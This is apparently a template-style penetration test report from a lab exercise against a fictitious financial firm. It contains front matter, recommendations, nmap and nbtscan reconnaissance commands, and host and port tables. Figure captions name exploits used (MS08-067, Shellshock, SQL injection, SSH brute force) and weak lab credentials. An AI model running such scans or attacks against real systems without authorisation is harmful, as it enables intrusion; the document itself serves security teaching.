Penetration Testing

<Tester Name> CONFIDENTIAL Penetration Test Report for
FNB Financial Services
Your Name FNB FINANCIAL SERVICES,

Hyderabad, India
2101 MASSACHUSETTS AVE NW
WASHINGTON DC 20008
UNITED STATES
Sample Report CONFIDENTIAL Page |

1
YOUR NAME
Penetration Testing and Security Audit

for FNB Financial Services
Warning: THIS DOCUMENT, AND ALL ACCOMPANYING MATERIALS, MAY CONTAIN INFORMATION THAT COULD
SEVERELY DAMAGE OR IMPACT THE INTEGRITY AND SECURITY OF THE ORGANIZATION IF DISCLOSED PUBLICLY. THIS
DOCUMENT, AND ALL ACCOMPANYING MATERIALS, SHOULD BE SAFEGUARDED AT ALL TIMES AND MAINTAINED IN A
SECURE AREA WHEN NOT IN USE. YOUR NAME ASSUMES NO RESPONSIBILITY OR LIABILITY FOR THE SECURITY OF THIS
DOCUMENT OR ANY ACCOMPANYING MATERIALS AFTER DELIVERY TO THE ORGANIZATION NAMED HEREIN. IT IS THE
ORGANIZATION’S RESPONSIBILITY TO SAFEGUARD THIS MATERIAL AFTER DELIVERY.
THIS REPORT CONTAINS PROPRIETARY INFORMATION THAT IS NOT TO BE SHARED, COPIED, DISCLOSED OR OTHERWISE
DIVULGED WITHOUT THE EXPRESS WRITTEN CONSENT OF YOUR NAME OR THEIR DESIGNATED REPRESENTATIVE. USE
OF THIS REPORTING FORMAT BY OTHER THAN YOUR NAME OR ITS SUBSIDIARIES IS STRICTLY PROHIBITED AND MAY
BE PROSECUTED TO THE FULLEST EXTENT OF THE LAW.
Disclaimer: THE RECOMMENDATIONS CONTAINED IN THIS REPORT ARE BASED ON INDUSTRY STANDARD “BEST
PRACTICES”. BEST PRACTICES ARE, BY NECESSITY, GENERIC IN NATURE AND MAY NOT TAKE INTO ACCOUNT
EXACERBATING OR MITIGATING CIRCUMSTANCES. THESE RECOMMENDATIONS, EVEN IF CORRECTLY APPLIED, MAY
CAUSE CONFLICTS IN THE OPERATING SYSTEM OR INSTALLED APPLICATIONS.
ANY RECOMMENDED CHANGES TO THE
OPERATING SYSTEM OR INSTALLED APPLICATION SHOULD FIRST BE EVALUATED IN A NON-PRODUCTION
ENVIRONMENT BEFORE BEING DEPLOYED IN YOUR PRODUCTION NETWORK.
YOUR NAME
HYDERABAD, INDIA - 500050

2
Document Details
Document Title Penetration Testing Report

Company Your Name
Recipient FNB Financial Services
Date June 30, 2015
Classification Confidential
Document Type Report
Version v1.2
Author Your Name
Pen Testers Your Name
Reviewed By Nityanand
Approved By Nityanand
Version History Information
Date Version Author Comments

June 30,2016 v1.0 Your Name First Draft Penetration Testing Report
July 3, 2016 v1.1 Your Name Second draft Added more content
July 7, 2016 v1.2 Your Name Final Draft Reviewed
Recipient
Name Title Company
Smith Penetration Testing Report FNB Financial Services

3
Penetration Testing Team Members
Name Company Role

Consultant Name Your Name Penetration Testing Data Collection
Consultant Name Your Name Penetration Testing Data Collection
Consultant Name Your Name Regional Security Practice Manager
Consultant Name Your Name FNB Financial Services Services Manager
Consultant Name Your Name Principal Consultant
Consultant Name Your Name Consultant, Security
FNB Financial
Consultant Name Manager of Network Infrastructure
Services
FNB Financial
Consultant Name Network Security Analyst
Services
Contact
Name Your Name

Address Hyderabad, India
Phone +91-9959043243
Email Your Name.er@gmail.com

4
Table of Contents
Document Details ...................................................................................................................................................3
Version History Information.................................................................................................................................3
Recipient ..................................................................................................................................................................3
Penetration Testing Team Members ..................................................................................................................4
Contact .....................................................................................................................................................................4
1.0 Executive Summary ......................................................................................................................................9
1.1. Project Scope ............................................................................................................................................9
1.2. Project Objectives ....................................................................................................................................9
1.3. Target Systems ..........................................................................................................................................9
1.4. Assumptions ............................................................................................................................................ 11
1.5. Timeline ................................................................................................................................................... 11
1.6. Summary of Evaluation .......................................................................................................................... 11
1.7. Finding Rating Levels ............................................................................................................................ 12
1.8. Risk Assessment Metrix ........................................................................ Error! Bookmark not defined.
1.1. Summary of Findings ............................................................................................................................. 12
1.2. Summary of Recommendation ............................................................................................................. 14
1.2.1. Personnel ........................................................................................................................................ 14
1.2.2. Policies and Procedures ............................................................................................................... 15
1.2.3. Critical Vulnerabilities ................................................................. Error! Bookmark not defined.
1.2.4. Identification and Authentication ............................................................................................... 15
1.2.5. Intrusion Detection ........................................................................................................................ 14
1.2.6. Conclusion ...................................................................................................................................... 16
1.3. Testing Methodology............................................................................................................................. 16
1.3.1. Planning ........................................................................................................................................... 16
1.3.2. Exploitation ..................................................................................................................................... 17
1.3.3. Reporting......................................................................................................................................... 17
2.0 Comprehensive Technical Report ........................................................................................................... 18
[Challenge 1:] Information Gathering ............................................................................................................. 18
[Challenge 2:] Network Scanning and Service Enumeration ..................................................................... 25
[Challenge 3:] Database Penetration Testing - SQL Injection..................................................................... 37
[Challenge 4:] Cloud Penetration Testing ...................................................................................................... 43
[Challenge 5:] Penetration Testing WordPress Site for Plugin Vulnerabilities ....................................... 48
Appendixes ............................................................................................................................................................. 107
Appendix A: References................................................................................................................................... 107
Appendix B: Glossary ....................................................................................................................................... 108

5
List of Illustrations
FIGURE 1: SUMMARY OF FINDINGS .............................................................................................................................13

FIGURE 2: NETWORK DIAGRAM ..................................................................................................................................18
FIGURE 3: SCANNING 192.168.0.X NETWORK .............................................................................................................19
FIGURE 4 SCANNING 10.XX.XXX.XXX MACHINES .........................................................................................................19
FIGURE 5: SCANNING 172.XX.XXX.XXX MACHINES ......................................................................................................19
FIGURE 6: SCANNING 172.17.0.X MACHINES ..............................................................................................................19
FIGURE 7: SCANNING 172.19.19.X MACHINES ............................................................................................................20
FIGURE 8: NMAP FOR 172.17.0.0/24 ...........................................................................................................................20
FIGURE 9: SCANNING 172.19.19.0/24 .........................................................................................................................21
FIGURE 10: HOSTS IN THE NETWORK (ZENMAP) .........................................................................................................21
FIGURE 11: FINDING THE OS VERSION IN A HOST .......................................................................................................22
FIGURE 12: FINDING OPEN PORTS AND SERVICES.......................................................................................................22
FIGURE 13: BNTSCAN FOR 172.19.19.X ....................................................................................................................26
FIGURE 14: NMAP FOR 172.19.19.8 ............................................................................................................................26
FIGURE 15: SMB VULNERABILITIES .......................................................................................................................27
FIGURE 16: MSFCONSOLE ........................................................................................................................................28
FIGURE 17: SEARCH MS08_067 EXPLOIT .....................................................................................................................28
FIGURE 18: MS08-067 EXPLOIT .................................................................................................................................29
FIGURE 19: METERPRETER SESSION FOR OPERATIONS ..................................................................................29
FIGURE 20: DOCUMENTS IN OPERATIONS MACHINE ......................................................................................30
FIGURE 21: DOWNLOAD THE DOCUMENT .........................................................................................................31
FIGURE 22: HASH VALUE OF DOCUMENT ...........................................................................................................31
FIGURE 23: PERSONAL FOLDER WITH LARGE IMAGES ....................................................................................32
FIGURE 24: DOWNLOAD IMAGES IN /VAR/WWW/IMAGES .............................................................................32
FIGURE 25: START APACHE SERVICE ....................................................................................................................33
FIGURE 26: DOWNLOAD IMAGES IN WINDOWS MACHINE .............................................................................33
FIGURE 27: SAVE THE FILES IN C:/IMAGES .........................................................................................................34
FIGURE 28: QUICKSTEGO INSTALLATION ...........................................................................................................34
FIGURE 29: QUICKSTEGO OPEN IMAGE ..............................................................................................................35
FIGURE 30: THE_SOWER.BMP HIDDEN INFORMATION ...................................................................................36
FIGURE 31: 172.19.19.X HOSTS ..................................................................................................................................38
FIGURE 32: UNBUNTU MACHINE ...........................................................................................................................38
FIGURE 33: DIRB FUZZING ......................................................................................................................................39
FIGURE 34: DIRB FUZZING FOR CGI-BIN .............................................................................................................39
FIGURE 35: SHELLSHOCK HINT IN CGI-BIN URL ................................................................................................40
FIGURE 36: SET OPTIONS FOR SHELL SHOCK EXPLOIT ...................................................................................41
FIGURE 37: METERPRETER SESSION FOR UBUNTU MACHINE .......................................................................41
FIGURE 38: DOCUMENT LOCATION ......................................................................................................................42
FIGURE 39: DOWNLOAD “CUSTOMER DATA.XLSX” ..........................................................................................42
FIGURE 40: HASH VALUE OF “CUSTOMER DATA.XLSX” ...................................................................................42
FIGURE 41: SCAN FOR 172.17.X.X HOSTS ...............................................................................................................44
FIGURE 42: OPEN PORTS AND SERVICES IN 172.17.0.3 .......................................................................................44
FIGURE 43: EXPLOIT /AUXILIARY/SCANNER/SSH/SSH_LOGIN ....................................................................45
FIGURE 44: BRUTEFORCE USING SSH_LOGIN : (ROOT:PASSWORD WORKS) ................................................46
FIGURE 45: SESSIONS OBTAINED ...........................................................................................................................46
FIGURE 46: TERMS OF SERVICE.PDF......................................................................................................................47
FIGURE 47: NETWORK SCAN 172.19.19.XX .............................................................................................................49
FIGURE 48: PORT SCANNING FOR 172.19.19.2 .......................................................................................................49
FIGURE 49: SEARCH SSHD EXPLOITS ....................................................................................................................49
FIGURE 50: SET OPTIONS FOR SSHD EXPLOIT...................................................................................................50

6
FIGURE 51: METERPRETER SESSION .....................................................................................................................50
FIGURE 52: FNB_TRADING_SUMMARY.XLS .........................................................................................................51
FIGURE 53: DOWNLOAD FNB_TRADING_SUMMARY.XLS.................................................................................51
FIGURE 54: HASH VALUE FOR FNB_TRADING_SUMMARY.XLS .......................................................................51
FIGURE 55: ACCESS DENIED FOR JOHN AND JASON USERS ...........................................................................52
FIGURE 56: MS13_053 FOR PRIVILEGE ESCALATION .........................................................................................53
FIGURE 57: ESCALATED SESSION ...........................................................................................................................53
FIGURE 58: HASHDUMP IN 172.19.19.2 ....................................................................................................................53
FIGURE 59: HASHES.TXT...........................................................................................................................................54
FIGURE 60: HOST HASHES.TXT IN APACHE SERVER IN KALI LINUX ............................................................54
FIGURE 61: UNIX_PASSWORDS.TXT FOR BRUTEFORCING ..............................................................................54
FIGURE 62: ACCESS THE HOSTED FILES IN WINDOWS MACHINE .................................................................55
FIGURE 63: PASSWORD CRACKED USING CAIN ..................................................................................................55
FIGURE 64: REMOTE DESKTOP FOR 172.19.19.2 ...................................................................................................56
FIGURE 65: SUCCESSFUL LOGIN USING ARNOLD USER ...................................................................................57
FIGURE 66: WWW.FNB.COM LOGIN PAGE ............................................................................................................59
FIGURE 67: LOGGED AS SMITH SUCCESSFULLY .................................................................................................60
FIGURE 68: SMITH’S PROFILE ..................................................................................................................................61
FIGURE 69: JOHN’S PROFILE ....................................................................................................................................62
FIGURE 70: BLOG TAB OF WWW.FNB.COM...........................................................................................................63
FIGURE 71: XSS ALERT ..............................................................................................................................................64
FIGURE 72: PAGE SOURCE FOR XSS INJECTION .................................................................................................64
FIGURE 73: HRDEPT’S IP ADDRESS : 172.19.19.6 ....................................................................................................68
FIGURE 74: NMAP FOR 172.19.19.6 ............................................................................................................................69
FIGURE 75: WORDPRESS VULNERABILITY HINT ................................................................................................69
FIGURE 76: WPSCAN FOR HTTP://172.19.19.6/ECSA ............................................................................................70
FIGURE 77: WORDPRESS PLUGIN EXPLOIT .........................................................................................................71
FIGURE 78: METERPRETER SESSION OBTAINED ...............................................................................................71
FIGURE 79: EMPLOYEE DETAILS.XLSX .................................................................................................................71
FIGURE 80: DOWNLOAD THE DOCUMENT .........................................................................................................72
FIGURE 81: FIND THE HASH VALUE OF “EMPLOYEE DETAILS.XLSX” ..........................................................72
FIGURE 82: ACTIVE DIRECTORY NETWORK SCAN ............................................................................................73
FIGURE 83: DOMAIN NAME FOR ACTIVE DIRECTORY MACHINE: LPTLABS.COM ......................................74
FIGURE 84: DOMAIN NAME FOR ACCOUNTS MACHINE: LPTLABS.COM .......................................................74
FIGURE 85: SET OPTIONS FOR SSHD EXPLOIT FOR ACCOUNTS MACHINE ................................................75
FIGURE 86: METERPRETER SESSION IN ACCOUNTS MACHINE ......................................................................75
FIGURE 87: MS13_053 FOR PRIVILEGE ESCALATION .........................................................................................76
FIGURE 88: ESCALATED SESSION ...........................................................................................................................76
FIGURE 89: CACHEDUMP FOR JASON....................................................................................................................77
FIGURE 90: JASON PASSWORD IS AMAZ0N ...........................................................................................................77
FIGURE 91: REMOTE DESKTOP CONNECTION TO ACCOUNTS MACHINE ..................................................78
FIGURE 92: SHARES IN ACTIVE DIRECTORY MACHINE....................................................................................79
FIGURE 93: ACCESS FOLDERS IN SYSVOL SHARE ...............................................................................................79
FIGURE 94: GPTTMPL.INI IN \\172.19.19.3...\SECEDIT FOLDER ........................................................................80
FIGURE 95: IP ADDRESS OF ENTERTAINMENT: 10.10.0.2 ...................................................................................81
FIGURE 96: VISIT HTTP://10.10.0.2/MOVIESCOPE AND SQL INJECTION ON PASSWORD FIELD ..............82
FIGURE 97: LOGGED AS “ADMIN” .........................................................................................................................83
FIGURE 98: URL PARAMETER TAMPERING ..........................................................................................................83
FIGURE 99: STEVE’S PROFILE ..................................................................................................................................84
FIGURE 100: TXTPWD PARAMETER TO RUN SQLMAP .......................................................................................84
FIGURE 101: SQLMAP FOR MOVIESCOPE .............................................................................................................85
FIGURE 102: DATABASES NAME .............................................................................................................................85
FIGURE 103: LOGIN PAGE FOR XSECURITY SITE ...............................................................................................86

7
FIGURE 104: LOGIN AS SMITH USING BLIND SQL INJECTION ........................................................................86
FIGURE 105: SQLMAP TO GET TABLE NAMES IN XSECURITY DATABASE ....................................................87
FIGURE 106: TABLES IN XSECURITY DATABASE ................................................................................................87
FIGURE 107: COLUMN NAMES IN USERS TABLE FOR XSECURITY DATABASE ............................................88
FIGURE 108: USERNAMES IN USERS TABLE .........................................................................................................88
FIGURE 109: PASSWORDS IN USERS TABLE ..........................................................................................................89
FIGURE 110: LOGIN TO XSECURITY SITE USING JOHN/JOHN@123 ..............................................................89
FIGURE 111: SUCCESSFUL LOGIN AS JOHN ..........................................................................................................90
FIGURE 112: SQL SERVER DATABASE VERSION .................................................................................................90
FIGURE 113: NBTSCAN FOR 10.10.0.X MACINES ...................................................................................................92
FIGURE 114: OPEN PORTS AND SERVICES IN 10.10.0.3 .......................................................................................93
FIGURE 115: AUXILIARY/SCANNER/MYSQL/MYSQL_LOGIN METASPLOIT EXPLOIT ..............................94
FIGURE 116: SET USERNAME AS ROOT .................................................................................................................94
FIGURE 117: SUCCESSFUL LOGIN TO MYSQL ......................................................................................................95
FIGURE 118: MOVIESCOPE DATABASE INFORMATION ....................................................................................96
FIGURE 119: QUEENHOTEL DATABASE INFORMATION ..................................................................................96
FIGURE 120: QUEENHOTEL DATABASE INFORMATION: EMPTY TABLES ...................................................97
FIGURE 121: MYSQL DATABASE INFORMATION: DEFAULT DATABASE .......................................................98
FIGURE 122: MYSQL DATABASE INFORMATION: USER TABLE .......................................................................99
FIGURE 123: INFORMATION_SCHEMA DATABASE INFORMATION: DEFAULT ........................................100
FIGURE 124: NBTSCAN FOR 172.19.9.XX MACHINE ...........................................................................................102
FIGURE 125: NMAP SCAN FOR 172.19.9.XX MACHINE .......................................................................................103
FIGURE 126: HTTP://172.19.19.9/ECSA USES JOOMLA .......................................................................................104
FIGURE 127: SET OPTIONS FOR JOOMLA_MEDIA_UPLOAD_EXPLOIT .......................................................105
FIGURE 128: METERPRETER SESSION IN 10.10.0.3 .............................................................................................105
FIGURE 129: \USERS\STUDENT\DOCUMENTS\RND NDA.PDF .....................................................................106
FIGURE 130: HASH VALUE OF “RND NDA.PDF .................................................................................................106
List of Tables
TABLE 1: TARGET SYSTEM............................................................................................................................................10
TABLE 2: TIMELINE .......................................................................................................................................................11
TABLE 3: SEVERITY LEVELS ...........................................................................................................................................12
TABLE 4: SUMMARY OF FINDINGS...............................................................................................................................12
TABLE 5: HOSTS AND OPERATING SYSTEMS ................................................................................................................23
TABLE 6: OPEN PORTS AND SERVICES ON HOSTS .............................................................................................24

8
1.0 Executive Summary

Your Name was engaged to conduct a Penetration Testing (PT) on the perimeter and network systems
of FNB Financial Services during the period of June 2016 to July 2016. Your Name's objective was to
discover significant vulnerabilities within the FNB Financial Services network infrastructure.
The most significant findings relate to the un-patched vulnerabilities, in-secure configurations, human
errors like weak passwords, default usernames/passwords and insecure coding practices behind the
FNB Financial Services and a significant number of vulnerabilities that result in the network and
systems being susceptible to compromise from the internal network. The detailed penetration testing
findings are described later in this document and have been ordered according to severity.
The vulnerabilities found during this assessment present several risks to FNB Financial Services.
These vulnerabilities were exploited to gain access to different hosts in the network as well escalate
the gain access to administrator rights and gain access to confidential documents like employees data.
In conclusion, Your Name strongly recommends that FNB Financial Services should patch all
unpatched softwares/systems in the network. The systems/softwares should been updated regularly
to avoid being exploited. Also, employees/administrators should be educated for to follow secure
practices like complex passwords which are not prone to dictionary attacks/bruteforce attacks.
Developers should follow secure coding practices to prevent injection attacks. Regular audits can help
the organization to prevent such attacks.
1.1. Project Scope

The assessment performed was focused on FNB Financial Services’ internal network and its related
application infrastructure. This result is intended to be an overall assessment of FNB Financial
Services network, and those systems and subnets that fall within the scope of this project.
Furthermore, the findings in this report reflect the conditions found during the testing, and do not
necessarily reflect current conditions.
1.2. Project Objectives

The objective of FNB Financial Services’ network and application assessment is to determine the
overall security by analyzing all possible transactions, user input variables, and application components
that reside on network systems. For the testing, we attempted to perform a black-box test.
The objective of the security assessment and penetration test of the network infrastructure supporting
the application is to determine the overall security of the network segments and hosts within the scope
of the engagement.
1.3. Target Systems

The following table lists all devices that were targeted during this assessment.

9
Target System Name FNB Financial Services
Target System URL http://www.fnb.com
Test Type Black Box

IP Addresses
192.168.0.1-5, 10.10.0.1-3, 172.17.0.1-3, 172.19.19.1-10
Discovered
The network systems are connected through GNAT router
Network Details
and has Windows as well as Linux systems.
Web Server www.fnb.com (172.17.0.2)
www.fnb.com: 21, 80, 135, 139, 445, 3389, 47001, 49152-7
Network Ports
Detailed analysis is give in Challenge 1 section of the report
www.fnb.com: Microsoft Windows Server 2008 R2 Enterprise
7601 Service Pack 1 (Windows Server 2008 R2 Enterprise 6.1)
System Configuration
We found Windows as well Linux hosts in the network. The
details are given under challenge 1.
Table 1: Target system

10
1.4. Assumptions
We assumed that all IP addresses are public IP addresses and the organization has implemented the
security policies available with them.
1.5. Timeline
The timeline of the test is as below:
Categories Initiation Date/Time Completion Date/Time
Footprinting and
June 16, 2016 June 19, 2016
Reconnaissance
Network and Host
June 17, 2016 June 20, 2016
Scanning
Enumeration June 21, 2016 June 23, 2016
Exploitation June 25, 2016 July 2, 2016
Post Exploitation July 3, 2016 July 5, 2016
Clean-up July 6, 2016 July 8, 2016
Table 2: Timeline
1.6. Summary of Evaluation

 Perform broad scans to identify potential areas of exposure and services that may act as entry
points
 Perform targeted scans and manual investigation to validate vulnerabilities
 The test identified components to gain access to
o <13 IP addressed devices>
 Identify and validate vulnerabilities
 Rank vulnerabilities based on threat level, loss potential, and likelihood of exploitation
 Perform supplemental research and development activities to support analysis
 Identify issues of immediate consequence and recommend solutions
 Develop long-term recommendations to enhance security
 Transfer knowledge
During the network level security checks we tried to probe the ports present on the various servers
and detect the services running on them with the existing security holes, if any. At the web application
level, we checked the web servers’ configuration issues, poor input validation issues and more
importantly the logical errors in the web application itself. We found the injection type of
vulnerabilities in web applications.

11
Finding Rating Levels
In the following Findings section, Your Name uses a rating system using stars (*) to indicate the level
of severity of our findings. All findings are vulnerabilities that have a business risk to the FNB
Financial Services.
Intruders can easily gain control of hosts and network. This
5 Stars ***** Critical
needs immediate attention.
Intruders can possibly gain control of the host, or there may be
4 Stars **** High potential leakage of highly sensitive information. This should
be addressed as soon as possible.
This could result in potential misuse of the host by intruders.
3 Stars *** Elevated
Address this at your convenience but do as soon as possible.
Intruders may be able to collect sensitive information from the
host, such as the precise version of software installed. With this
2 Stars ** Moderate information, intruders can easily exploit known vulnerabilities
specific to software versions. Address this the next time you
perform a minor reconfiguration of the host.
Intruders can collect information about the host (open ports,
services, etc.) and may be able to use this information to find
1 Stars * Low
other vulnerabilities. Address this the next time you perform a
major reconfiguration of the host.
Table 3: Severity Levels
1.7. Summary of Findings

Nessus Vulnerability Assessment tool was used to find the vulnerabilities in all the hosts:
Value Number of Risks

Medium 102
High 40
Critical 24
Table 4: Summary of findings

12
Figure 1: Summary of findings

13
1.8. Summary of Recommendation
This General Opinion will discuss several overarching concerns that became apparent during the
Penetration Testing. This discussion is intended to provide more in-depth and detailed analysis of the
various issues brought forth in the Executive Summary and provides further illumination on the more
significant risks to FNB Financial Services.
1.8.1. Intrusion Detection

Because of FNB Financial Services's open and fluid environment and the fact that new network-
based threats are identified almost daily, an effective means to detect, react, and manage events is
necessary. An IDS (intrusion detection system) to identify suspect activity and alert someone of
the risk is becoming an increasingly critical part of the security architecture. In most environments,
this would be coupled with segmentation of network resources across internal firewalls or
centralized I&A services. While segmentation may not be feasible within the current FNB
Financial Services trust model and architecture, I&A services as well as increased auditing are
possible.
An IDS hat can conduct profiling as well as one that utilizes signatures would most likely be the
best fit for FNB Financial Services. The profiling of users, especially after the implementation of
an I&A service, would allow for anomalous activity to be detected immediately and would allow
for an automated review of various system logs that are not being properly reviewed at this time.
1.8.2. Critical Vulnerabilities
The large number of vulnerabilities discovered, both those that are critical in and of themselves as
well as those that can be exploited in concert to become critical vulnerabilities, leave many of the
most sensitive systems at FNB Financial Services exposed to internal users. The firewall and
perimeter devices should be configured in such a way that it would be very difficult for an outside
user to successfully attack one of the sensitive systems. This is not the case for an attacker on the
inside. Any knowledgeable user could gain complete access to all of the critical systems of the
infrastructure and the core network components themselves. There are various critical
vulnerabilities found in the network hosts like vulnerable SMB services, Joomla services which are
un-patched and vulnerable.
1.8.3. Personnel
While organizations try to employ a litany of security controls and processes to avoid becoming
a victim of security breach, human error is one factor that can’t always be controlled or relied
upon. Weak passwords, insecure coding practices, insecure configurations can be avoided by
educating the personnel involved FNB Financial services.
While several people involved with maintaining the network and systems have expressed
concerns over the access given to entities (such as developers), the FNB Financial Services
security architecture does not provide, by design, any means of limiting these individual's or
group's network infrastructure access. FNB Financial Services tends to accept the risks
associated with having a completely open internal architecture in order to accommodate the

14
fluid and changing nature of the environment. However, a documented rationale should
accompany any risks that are accepted.
FNB Financial Services has several knowledgeable and skilled individuals in the Information
Technology department. These individuals are aware of security- related issues and understand
that their internal systems are completely open and accessible. They differ in their opinions as to
the severity of this situation. The situation entrusts a great deal of power and responsibility, to the
point that any one of a handful of administrators, acting independently, has the capability to
compromise a system without any of the other administrators being aware that any misuse has
occurred. This requires a great deal of trust in these administrators, which is evidently well placed;
however, future employees who may hold these positions may not be as trustworthy. Without
measures in place to monitor the activity of such individuals, current or future intrusions or
compromises may not be detectable.
1.8.4. Policies and Procedures

FNB Financial Services has several policies and procedures in place to inform its users of the
responsibilities and obligations associated with the use of information resources. While the policies
in place are adequate in regard to what they address, there appear to be several missing policies,
either policies that are referenced and then are not readily available, or policies considered
necessary that do not appear to be present. These policies would generally indicate how standards
and procedures are to be created and how compliance with the existing policies, standards, and
procedures would be monitored. Along with educating the individuals, policies and procedures
will ensure that security practices are in place and not violated.
1.8.5. Web Application Security

Your Name found that the web applications for FNB Financial Services are prone to various
attacks like SQL Injection and XSS. The web applications should be secured as it is the user
interface which is open to the outside world. The vulnerabilities in UI when exploited can lead to
serious attacks like compromising the complete database server which can lead to legal
implications for the organization. It also hampers are organization business. Security should be
implemented at multiple layers of the web applications.
1.8.6. Identification and Authentication

FNB Financial Services does not have an Identification & Authentication (I&A) process. With the
absence of an I&A service, it becomes very difficult to correlate events across multiple platforms
and link them into a single entity. It would also be nearly impossible to trace an event to an
individual or group. These events are occurring, as Your Name noted, during some of the
Penetration Testing tests. User IDs and passwords only provide single-factor identification. In
systems where the value of the resource justifies stronger authentication and the ability to trace a
user identity, there must be at least two-factor authentication: one that is unique to the individual
and one generated randomly at the time credentials are presented. An I&A service, with a time
service such as the one FNB Financial Services already has, can also address one of the more
difficult problems that exists in modern networked environments, the issue surrounding time of
a change in privilege versus the time of privilege usage.

15
The problem, known as TOCTOU (Time of Change versus Time of Use) comes from a practice
during the old mainframe days where the privilege a user has been granted at log-in. The user
privileges were managed by the systems Reference Monitor, which was an integral part of the
operating system. Therefore, any change in the user's privilege level was immediately enforced by
the operating system, so there was a period of time when the user's privileges that were in effect
did not match the privileges that the user was invoking. In networked environments, the practice
still exists of granting privilege at the time of log-in. However, because there is no centralized
Reference Monitor that is directly tied into each and every operating system on the network, a
change in the user's privilege level is not registered until the user logs off the network and then
logs back on. This is the TOCTOU problem. Identification and Authentication services, when
coupled with a timely service, can resolve this issue in that they force users to present their
credentials before accessing any resource on the network. This provides a chance for the privileges
to be checked, as well as ensuring the authenticity of the identity of the user ID accessing the
resource.
1.8.7. Conclusion
Regardless of the frequency of vulnerability testing, no critical system can be considered acceptably
protected unless both the network segments and the critical hosts/servers are monitored
constantly for signs of abuse and intrusion attempts. Because new exploits and vulnerabilities
within devices and network operating systems are discovered regularly, it is impossible to test a
network completely, giving 100 percent assurance of being impervious to penetration either from
within or from outside. Additionally, FNB Financial Services has chosen a trust model in which
the application of stronger internal controls is more difficult than in a more restrictive trust model.
Therefore, the easiest method of detecting misuses would be some type of intrusion detection
system that is both network based and can do user profiling. Without appropriate identification
and authentication of users, referencing abuses to specific individuals becomes unreliable. Without
appropriate audit controls that ensure compliance with policies, the policies and procedures
themselves become untenable.
Your Name believes the corrective actions and recommendations in this report will improve FNB
Financial Services' ability to avoid breaches of information security. However, Your Name
strongly recommends that an Intrusion Detection and Identification and Authentication capability
be added to the network to detect misuse and intrusions and provide the information necessary
to support forensic investigations. It is also recommended that additional audit controls such as
compliance testing, independent log review, or configuration audits be implemented, with the
results of these controls incorporated with the results of the IDS capability. A policy and
procedure review, combined with a risk analysis, would also be very beneficial at this point in time
to streamline and reiterate those policies that are critical to the functioning of the enterprise. Web
applications should also be tested and patched for any security flaws.
1.9. Testing Methodology

1.9.1. Planning
During the planning, we gather information from the server in which the web application is
installed. Then, we detect the path information and identifiable software and determined the
running their versions.
16
1.9.2. Exploitation
Utilizing the information gathered during the planning, we start to find the vulnerability for each
piece of software and service that we discovered after that trying to exploit it.
1.9.3. Reporting
Based on the results from the first two steps, we start analyzing the results. Our risk rating is based
on this calculation:
Risk = Threat * Vulnerability * Impact
After calculating the risk rating, we start writing the report on each risk and how to mitigate it.

17
2.0 Comprehensive Technical Report

[Challenge 1:] Identify all the machines in the network. a) IP
addresses of all machines b) OS and versions c) open ports d)
services running on open ports.
Category: Authorization
Vendor Reference: -
PCI Vuln: Yes
Tools Used: nmap, zenmap, nbtscan
Threat Description:
This challenge involved the network scanning for the systems identified. We have a network diagram
given in the assignment document based on which we conducted the network scans for open ports
and services on the systems in the network.
Figure 2: Network Diagram
Methodology:
We used nmap, nbtscan and zenmap for identifying hosts, open ports and services running in these
ports.
We note that the systems are 192.168.0.x, 10.xx.xxx.xxx, 172.xx.xxx.xxx and 172.xx.xxx.xxx as shown
in figure 2 above.
We scan the network using the Linux machine provided to us (IP Address: 192.168.0.5)
1. Use nbtscan to find the hosts’ IP Addresses in the network.

18
Figure 3: Scanning 192.168.0.x network
2. The second IP Addresses series is 10.xx.xxx.xxx. Run nbtscan:
Figure 4 Scanning 10.xx.xxx.xxx machines
3. nbtscan for 172.xx.xxx.xxx
Figure 5: Scanning 172.xx.xxx.xxx machines
We find that there are 2 series: 172.17.0.xxx and 172.19.19.xxx. Run nbtscan for them
Figure 6: Scanning 172.17.0.x machines

19
Figure 7: Scanning 172.19.19.x machines
4. Using nmap ping sweep, we find that 172.17.0.3 is also up, hence it is a Linux system.
Figure 8: nmap for 172.17.0.0/24
5. nmap ping sweep indicates that 172.19.19.5 is also up. Hence, it’s a Linux system.

20
Figure 9: Scanning 172.19.19.0/24
Now we have identified all the hosts given in the ECSA assignment as shown in figure 10.
Figure 10: Hosts in the network (Zenmap)

21
6. We ran nmap and zenmap to identify open ports, services and operating system on all the
hosts:
To find Operating System, we used
nmap –O <ip address>
nmap --script smb-os-discovery --script-args=unsafe=1 <ip address> (as shown in Figure 11)
nmap –O –sV –max-os-tries=50 <ip address>
To scan all the ports and services we used nmap -A –p 0-65535 <ip address>
Figure 11: Finding the OS version in a host
Figure 12: Finding Open Ports and Services

22
Operating Systems and versions:
IP Address/ Operating System and version

Computer Name
10.10.0.2 Windows Server 2008 R2 Enterprise 7601 Service Pack
(ENTERTAINMENT) 1(Enterprise 6.1)
(ECOMM) 1(Enterprise 6.1)
1(Enterprise 6.1)
172.17.0.3 Linux CentOS 6.4
172.19.19.2 Windows 7 Ultimate 7601 SP1 (6.1)
(ACCOUNTS)
172.19.19.3 Windows Server 2008 Standard 6001 SP1
172.19.19.4 Windows Server 2008 Standard 6001 SP1
(ADVERTISEMENT)
172.19.19.5 Linux Ubuntu
(ubuntu service on port 80)
172.19.19.6 Windows Server 2012
(HRDEPT)
172.19.19.7 Windows Vista
(MARKETING)
172.19.19.8 Windows XP
(OPERATIONS)
172.19.19.9 Windows 8 Pro 9200
(RDDEPT)
172.19.19.10 Windows 7 Ultimate 7601 SP1 (6.1)
(SALES)
GNAT ROUTER Windows Server 2003 3790 SP2 (5.2)
(192.168.0.1, 172.19.19.1,
172.17.0.1, 10.10.0.1)
Table 5: Hosts and Operating systems
OPEN PORTS/SERVICES
IP Address Open Ports Services
10.10.0.2 21,80,135,139,445,3389, ftp, http MS IIS httpd 7.5, msrpc, netbios-ssn, rdp (ms-wbt-
47001,49152,49153,49154, server), MS HTTPAPI httpd 2.0
49155,49156,49157
10.10.0.3 21,80,135,139,445,3306,3389, ftp, http MS IIS httpd 7.5, msrpc, Mysql, rdp (ms-wbt-server),
47001,49152,49153,49154, netbios-ssn, MS HTTPAPI httpd 2.0
49155,49156,49157

23
172.17.0.2 21,80,135,139,445,3389,47001, ftp, http, msrpc, rdp (ms-wbt-server), netbios-ssn, ms httpapi

49152,49153,49154,49155, httpd 2.0
49156,49157
172.17.0.3 21,22,23 ftp, ssh (OpenSSH 5.3), telnet
172.19.19.2 21,45,80,135,139,445,3389, ftp, ssh (WeOnlyDo sshd 2.1.3), http, msrpc, rdp (ms-wbt-
49152,49153,49154,49155, server), netbios-ssn
49156,49157
